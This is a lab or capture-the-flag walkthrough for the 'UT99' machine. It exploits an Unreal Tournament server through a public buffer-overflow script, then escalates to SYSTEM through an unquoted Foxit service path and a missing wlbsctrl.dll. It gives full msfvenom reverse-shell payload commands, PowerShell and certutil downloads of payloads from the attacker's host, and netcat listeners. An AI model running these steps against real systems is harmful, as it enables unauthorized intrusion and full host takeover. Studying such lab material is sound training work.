Summary
We'll compromise this machine by exploiting an Unreal Tournament game server, which we found by enumerating an IRC server. We then escalate via either an unquoted service path, or by exploiting a missing DLL.
Enumeration
Nmap
We'll start off with a simple nmap scan.
root@kali:~# nmap -p- 192.168.120.84
Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-03-24 07:33 EDT
Nmap scan report for 192.168.120.84
Host is up (0.030s latency).
Not shown: 65186 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
443/tcp open https
3306/tcp open mysql
6660/tcp open unknown
6661/tcp open unknown
...
6999/tcp open iatp-normalpri
7000/tcp open afs3-fileserver
7001/tcp open afs3-callback
7005/tcp open afs3-volser
7007/tcp open afs3-bos
64738/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1211.68 seconds
root@kali:~#
This reveals many open InspIRCd ports.
FTP
We are able to log in as guest with an empty password, but don't have write privileges.
root@kali:~/Documents/VulnHub/UT99# ftp 192.168.120.84
Connected to 192.168.120.84.
220 MadCowz FTP!
Name (192.168.120.84:root): guest
331 Password required for guest
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
-r-xr-xr-x 1 ftp ftp 35984520 Oct 07 2015 FoxitReader706.1126_enu_Setup.exe
-r--r--r-- 1 ftp ftp 35922892 Oct 07 2015 KB968930.msu
-r-xr-xr-x 1 ftp ftp 114238280 Oct 07 2015 xampp-win32-5.6.12-0-VC11-installer.exe
226 Transfer OK
ftp> put test.txt test.txt
local: test.txt remote: test.txt
200 Port command successful
550 Permission denied
ftp> bye
221 Goodbye
root@kali:~/Documents/VulnHub/UT99#
KB968930.msu is a PowerShell script and FoxitReader706.1126_enu_Setup.exe is an installer for a version of Foxit Reader that contains a known vulnerability. This might come in handy later.
Web Application
Let's browse the default web page with curl.
root@kali:~/Documents/VulnHub/UT99# curl 192.168.120.84 -s | html2text
****** Index of / ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[DIR]] public_html/ 2013-11-13 14:52 -
===========================================================================
Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12 Server at
192.168.120.84 Port 80
root@kali:~/Documents/VulnHub/UT99#
Navigating to the public_html directory, we are met with the DragonFly CMS page. The read more link takes us to this page that contains the following hint:
We have our first match next Friday night against Cookie Monsters, so beloved daisy has setup a practice server for user to get back into the swing of things.
Join IRC and Mumble to get more information.
Posted by Fluffy on Saturday, October 03, 2015 (11:18:32) (12 reads)
IRC
Let's install the HexChat IRC client. We can skip the don't run as root warning.
apt-get install hexchat -y
Next, we'll open HexChat, click Add and set the name to anything. Then, we'll click Edit, set the Server to the ip of the target machine and Port to 7000.
Next, we'll click Close and set username to anything but root.
Let's click Connect, open the Channel-List Window and select show only channels with: 1 to 9999 users. Finally, we'll click Search and observe the following:
#ut99 [+nt] Fragging since UT99! Unreal Tournament 99 Game Server UP! IP: *THIS* Port: 7778
Exploitation
This version of Unreal Tournament is vulnerable to a remote buffer overflow.
root@kali:~# searchsploit "Unreal Tournament" | grep -v dos
------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File | exploits/multiple/remote/24041.c
Unreal Tournament - Remote Buffer Overflow (SEH) | exploits/windows/remote/16145.pl
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit) | exploits/linux/remote/16848.rb
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit) | exploits/windows/remote/16693.rb
Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit) | exploits/linux/remote/10032.rb
Unreal Tournament 3 1.3 - Directory Traversal | exploits/windows/remote/6506.txt
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# file /usr/share/exploitdb/exploits/windows/remote/16145.pl
/usr/share/exploitdb/exploits/windows/remote/16145.pl: ASCII text, with CRLF line terminators
root@kali:~#
Before we consider exploitation, we must keep in mind the following:
- Outbound port 4444/tcp is blocked
- Outbound port 443/tcp is blocked
- Port 7778/udp always reports as
open | filteredfrom an nmap scan
root@kali:~# nmap -p 7778 -sU -A -sV 192.168.120.84
Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-03-24 08:40 EDT
Nmap scan report for 192.168.120.84
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
7778/udp open|filtered interwise
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 32.30 ms 192.168.118.1
2 32.42 ms 192.168.120.84
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 116.24 seconds
root@kali:~#
To obtain a reverse shell, we'll set up a netcat listener on port 53 and then run the following to trigger the exploit:
root@kali:~/Documents/VulnHub/UT99# perl /usr/share/exploitdb/exploits/windows/remote/16145.pl 192.168.120.84 7778 192.168.118.3 53
root@kali:~/Documents/VulnHub/UT99#
Our netcat session caught the shell.
root@kali:~# nc -lvp 53
listening on [any] 53 ...
192.168.120.84: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.84] 49164
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\\UnrealTournament\\System>whoami
whoami
fluffy-pc\\daisy
C:\\UnrealTournament\\System>
Escalation
We have two privilege escalation vectors we can leverage at this point. Regardless of which we choose, we must keep the following in mind: when restarting the vulnerable service, we need to delay the power cycle for a few seconds and chain the exit command following the shutdown flags. If we run a command like shutdown -r -t 0, these exploits will likely crash the service with the following visual error:
This error may occur when we are still within the first reverse shell as the reboot takes place. This visual error will stall the reboot until the error is acknowledged. To deal with this, we'll need to delay the reboot by a few seconds and also chain the exit command (e.g. shutdown -r -t 10 && exit). This will schedule the reboot and terminate our shell properly after a second or two without crashing the service. The reboot will then succeed without issues, and we will get our privileged shell back.
Privilege Escalation Vector #1
Let's run systeminfo.
C:\\UnrealTournament\\System>systeminfo
systeminfo
Host Name: FLUFFY-PC
OS Name: Microsoft Windows Vista Business
OS Version: 6.0.6002 Service Pack 2 Build 6002
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: fluffy
Registered Organization:
Product ID: 89584-OEM-7332141-00029
Original Install Date: 10/1/2015, 5:09:16 AM
System Boot Time: 3/24/2020, 4:31:02 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 4/22/2019
Windows Directory: C:\\Windows
System Directory: C:\\Windows\\system32
Boot Device: \\Device\\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,023 MB
Available Physical Memory: 578 MB
Page File: Max Size: 2,312 MB
Page File: Available: 1,137 MB
Page File: In Use: 1,175 MB
Page File Location(s): C:\\pagefile.sys
Domain: WORKGROUP
Logon Server: \\\\FLUFFY-PC
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB2305420
[02]: KB2999226
[03]: KB935509
[04]: KB937287
[05]: KB938371
[06]: KB955430
[07]: KB968930
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.120.254
IP address(es)
[01]: 192.168.120.84
C:\\UnrealTournament\\System>
During the FTP enumeration, we spotted the FoxitReader installation. Let's determine if it's actually installed.
C:\\UnrealTournament\\System>dir "C:\\Program Files (x86)"
dir "C:\\Program Files (x86)"
Volume in drive C is HDD
Volume Serial Number is DC74-4FCB
Directory of C:\\Program Files (x86)
10/07/2015 04:04 AM <DIR> .
10/07/2015 04:04 AM <DIR> ..
11/02/2006 06:33 AM <DIR> Common Files
10/07/2015 04:04 AM <DIR> Foxit Software
10/03/2015 02:34 AM <DIR> InspIRCd
04/11/2009 09:30 AM <DIR> Internet Explorer
11/02/2006 08:05 AM <DIR> MSBuild
09/30/2015 11:12 PM <DIR> Mumble
11/02/2006 08:05 AM <DIR> Reference Assemblies
04/11/2009 09:30 AM <DIR> Windows Calendar
01/20/2008 08:09 PM <DIR> Windows Collaboration
01/20/2008 08:08 PM <DIR> Windows Defender
04/11/2009 09:30 AM <DIR> Windows Mail
04/11/2009 09:30 AM <DIR> Windows Media Player
11/02/2006 08:05 AM <DIR> Windows NT
04/11/2009 09:30 AM <DIR> Windows Photo Gallery
04/11/2009 09:30 AM <DIR> Windows Sidebar
0 File(s) 0 bytes
17 Dir(s) 13,053,112,320 bytes free
C:\\UnrealTournament\\System>
Sure enough, Foxit Software appears to be installed. It also appears to have an unquoted service path.
C:\\UnrealTournament\\System>wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\\windows\\\\" | findstr /i /v """
wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\\windows\\\\" | findstr /i /v """
Foxit Cloud Safe Update Service FoxitCloudUpdateService C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\Foxit Cloud\\FCUpdateService.exe Auto
C:\\UnrealTournament\\System>
In addition, we have write permissions to the directory.
C:\\UnrealTournament\\System>echo test123 > "C:\\Program Files (x86)\\Foxit Software\\test.txt"
echo test123 > "C:\\Program Files (x86)\\Foxit Software\\test.txt"
C:\\UnrealTournament\\System>type "C:\\Program Files (x86)\\Foxit Software\\test.txt"
type "C:\\Program Files (x86)\\Foxit Software\\test.txt"
test123
C:\\UnrealTournament\\System>
root@kali:~/Documents/VulnHub/UT99# searchsploit "foxit reader" | grep -v dos
------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit) | exploits/windows/local/16621.rb
Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit) | exploits/windows/local/16978.rb
Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasplo | exploits/windows/local/45269.rb
Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execu | exploits/windows/local/37699.py
Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow | exploits/windows/local/8201.pl
Foxit Reader 3.0 - Open Execute Action Stack Buffer Overflow (Metasploit | exploits/windows/local/18905.rb
Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbrea | exploits/windows/local/14727.py
Foxit Reader 4.1.1 - Local Stack Buffer Overflow | exploits/windows/local/15532.py
Foxit Reader 4.1.1 - Local Stack Overflow (Egghunter) | exploits/windows/local/15542.py
Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation | exploits/windows/local/36390.txt
Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass) | exploits/windows/local/45163.txt
Foxit Reader 9.0.1.1049 - Remote Code Execution | exploits/windows/remote/44941.txt
Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption | exploits/windows/local/36859.txt
Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit) | exploits/windows/remote/24502.rb
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/Documents/VulnHub/UT99# file /usr/share/exploitdb/exploits/windows/local/36390.txt
/usr/share/exploitdb/exploits/windows/local/36390.txt: UTF-8 Unicode (with BOM) text, with CRLF line terminators
root@kali:~/Documents/VulnHub/UT99#
Next, we'll prepare a malicious file and start a Python server.
root@kali:~/Documents/VulnHub/UT99# msfvenom -p windows/shell_reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.118.3 LPORT=444 > pwn.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 324 (iteration=0)
generic/none chosen with final size 324
Payload size: 324 bytes
Final size of exe file: 73802 bytes
root@kali:~/Documents/VulnHub/UT99#
root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Let's download the malicious file onto the target machine.
C:\\UnrealTournament\\System>dir "C:\\Program Files (x86)\\Foxit Software\\"
dir "C:\\Program Files (x86)\\Foxit Software\\"
Volume in drive C is HDD
Volume Serial Number is DC74-4FCB
Directory of C:\\Program Files (x86)\\Foxit Software
03/24/2020 07:29 AM <DIR> .
03/24/2020 07:29 AM <DIR> ..
10/07/2015 04:05 AM <DIR> Foxit Reader
03/24/2020 07:29 AM 10 test.txt
1 File(s) 10 bytes
3 Dir(s) 13,052,928,000 bytes free
C:\\UnrealTournament\\System>powershell -command "(New-Object System.Net.WebClient).DownloadFile('<http://192.168.118.3/pwn.exe>', 'C:\\Program Files (x86)\\Foxit Software\\Foxit.exe')"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('<http://192.168.118.3/pwn.exe>', 'C:\\Program Files (x86)\\Foxit Software\\Foxit.exe')"
C:\\UnrealTournament\\System>dir "C:\\Program Files (x86)\\Foxit Software\\"
dir "C:\\Program Files (x86)\\Foxit Software\\"
Volume in drive C is HDD
Volume Serial Number is DC74-4FCB
Directory of C:\\Program Files (x86)\\Foxit Software
03/24/2020 07:39 AM <DIR> .
03/24/2020 07:39 AM <DIR> ..
10/07/2015 04:05 AM <DIR> Foxit Reader
03/24/2020 07:39 AM 255,488 Foxit.exe
03/24/2020 07:29 AM 10 test.txt
2 File(s) 255,498 bytes
3 Dir(s) 13,052,563,456 bytes free
C:\\UnrealTournament\\System>
root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.120.84 - - [24/Mar/2020 10:39:14] "GET /evil.exe HTTP/1.1" 200 -
C:\\UnrealTournament\\System>
We'll need to press enter after the PowerShell command to get the command prompt back. Finally, we will set up a netcat listener and then power cycle the machine to restart the service with the malicious executable file.
C:\\UnrealTournament\\System>shutdown -r -t 10 && exit
shutdown -r -t 10 && exit
root@kali:~#
root@kali:~# nc -lvp 444
listening on [any] 444 ...
192.168.120.84: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.84] 49158
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
nt authority\\system
C:\\Windows\\system32>
Privilege Escalation Vector #2
When we leverage this attack vector, we'll need to deal with IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL. First we will check if the IKEEXT service exists, is enabled, and running.
C:\\UnrealTournament\\System>sc query IKEEXT
sc query IKEEXT
SERVICE_NAME: IKEEXT
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\\UnrealTournament\\System>
Next, we need to check if the wlbsctrl.dll file exists on the system.
C:\\UnrealTournament\\System>dir wlbsctrl.dll /s
dir wlbsctrl.dll /s
Volume in drive C is HDD
Volume Serial Number is DC74-4FCB
File Not Found
C:\\UnrealTournament\\System>
Next, we'll check the PATH variable.
C:\\UnrealTournament\\System>PATH
PATH
PATH=C:\\Python\\Scripts\\;C:\\Python\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\
C:\\UnrealTournament\\System>
The C:\Python\Scripts and C:\Python directories are interesting, so let's check their permissions.
C:\\UnrealTournament\\System>icacls C:\\Python\\Scripts\\
icacls C:\\Python\\Scripts\\
C:\\Python\\Scripts\\ BUILTIN\\Administrators:(I)(F)
BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\\SYSTEM:(I)(F)
NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\\Authenticated Users:(I)(M)
NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
C:\\UnrealTournament\\System>icacls C:\\Python\\
icacls C:\\Python\\
C:\\Python\\ BUILTIN\\Administrators:(I)(F)
BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\\SYSTEM:(I)(F)
NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\\Authenticated Users:(I)(M)
NT AUTHORITY\\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
C:\\UnrealTournament\\System>
Both folders have the Modify permission granted for NT AUTHORITY\\Authenticated Users so we can use either of them to write our custom wlbsctrl.dll file.
root@kali:~/Documents/VulnHub/UT99# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.118.3 LPORT=4445 -f dll > wlbsctrl.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
root@kali:~/Documents/VulnHub/UT99#
Next, we'll start a Python HTTP server and transfer the malicious file onto the target machine.
root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
C:\\UnrealTournament\\System>dir /B C:\\Python\\wlbsctrl.dll
dir /B C:\\Python\\wlbsctrl.dll
File Not Found
C:\\UnrealTournament\\System>powershell -command "(New-Object System.Net.WebClient).DownloadFile('<http://192.168.118.3/wlbsctrl.dll>', 'C:\\Python \\wlbsctrl.dll')"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('<http://192.168.118.3/wlbsctrl.dll>', 'C:\\Python \\wlbsctrl.dll')"
C:\\UnrealTournament\\System>dir /B C:\\Python\\wlbsctrl.dll
dir /B C:\\Python\\wlbsctrl.dll
wlbsctrl.dll
C:\\UnrealTournament\\System>
root@kali:~/Documents/VulnHub/UT99# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.120.84 - - [24/Mar/2020 11:18:17] "GET /wlbsctrl.dll HTTP/1.1" 200 -
Note that we will need to press enter after the PowerShell command to get the cmd prompt back. Finally, let's set up a netcat listener and then power cycle the machine to catch the privileged reverse shell.
C:\\UnrealTournament\\System>shutdown -r -t 10 && exit
shutdown -r -t 10 && exit
root@kali:~#
root@kali:~# nc -lvp 4445
listening on [any] 4445 ...
192.168.120.84: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.84] 49158
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
nt authority\\system
C:\\Windows\\system32>
PS
https://www.exploit-db.com/exploits/36390
Checking installed software on the target system we can see Foxit Reader is installed.
Directory of c:\Program Files (x86)
10/07/2015 04:04 AM <DIR> .
10/07/2015 04:04 AM <DIR> ..
11/02/2006 06:33 AM <DIR> Common Files
10/07/2015 04:04 AM <DIR> Foxit Software
10/03/2015 02:34 AM <DIR> InspIRCd
04/11/2009 09:30 AM <DIR> Internet Explorer
11/02/2006 08:05 AM <DIR> MSBuild
09/30/2015 11:12 PM <DIR> Mumble
11/02/2006 08:05 AM <DIR> Reference Assemblies
04/11/2009 09:30 AM <DIR> Windows Calendar
01/20/2008 08:09 PM <DIR> Windows Collaboration
01/20/2008 08:08 PM <DIR> Windows Defender
04/11/2009 09:30 AM <DIR> Windows Mail
04/11/2009 09:30 AM <DIR> Windows Media Player
11/02/2006 08:05 AM <DIR> Windows NT
04/11/2009 09:30 AM <DIR> Windows Photo Gallery
04/11/2009 09:30 AM <DIR> Windows Sidebar
0 File(s) 0 bytes
17 Dir(s) 13,051,826,176 bytes free
Querying the service on the target systems shows the service is running in the context of SYSTEM and the binary path indeed contains spaces and is not wrapped in quotes.
cmd:>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\Foxit Cloud\\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
I then tested for write privileges in the binary path by creating a text file in the C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\ path.
echo Hello > test.txt
Checking the contents of the directory after doing so we see the test.txt file.
Directory of c:\\Program Files (x86)\\Foxit Software\\Foxit Reader
08/25/2021 12:35 PM <DIR> .
08/25/2021 12:35 PM <DIR> ..
11/26/2014 06:03 PM 385,248 64BitMailAgent.exe
10/07/2015 04:04 AM <DIR> Advertisement
10/07/2015 04:04 AM <DIR> docusign
10/07/2015 04:05 AM <DIR> Foxit Cloud
08/25/2021 12:32 PM 7,168 Foxit.exe
11/27/2014 10:24 AM 42,164,448 FoxitReader.exe
11/27/2014 03:49 PM 74,588 FoxitReader.exe.man
11/26/2014 06:03 PM 4,856,544 FoxitUpdater.exe
11/26/2014 07:15 PM 1,621,728 FXCUSTOM.dll
10/07/2015 04:04 AM <DIR> lex
08/28/2014 10:25 AM 27,076 notice.txt
10/07/2015 04:04 AM <DIR> plugins
10/07/2015 04:04 AM <DIR> Release Note
11/26/2014 06:03 PM 2,093,280 SendCrashReport.exe
10/07/2015 04:04 AM <DIR> Shell Extensions
10/07/2015 04:04 AM <DIR> Skins
10/07/2015 04:04 AM <DIR> stamps
10/07/2015 04:04 AM <DIR> Start
08/25/2021 12:35 PM 8 test.txt '# Test file created'
11/26/2014 07:07 PM 2,302,176 TrackReview.exe
10/07/2015 04:05 AM 278,490 unins000.dat
10/07/2015 04:02 AM 1,479,392 unins000.exe
10/07/2015 04:05 AM 22,701 unins000.msg
11/18/2014 04:38 PM 2,004,704 UninstallPrint.exe
10/07/2015 04:05 AM 1,270 UpdaterInfo.xml
15 File(s) 57,318,821 bytes
12 Dir(s) 13,053,591,552 bytes free
I then performed a test reboot of the machine and confirmed that as the user Daisy I was able to reboot the machine. Currently this looks like we have a path to privilege escalation.
Firstly using msfvenom I created a stageless reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.142 LPORT=80 -f exe -o Foxit.exe
I then uploaded this to the directory C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\
certutil.exe -f -urlcache -split http://<IP>/Foxit.exe Foxit.exe
After the upload was completed I started a netcat listener on my attacking machine then rebooted the target system.
shutdown.exe -r -f -t 1
Shortly after I was able to obtain privileges as SYSTEM.
Discussion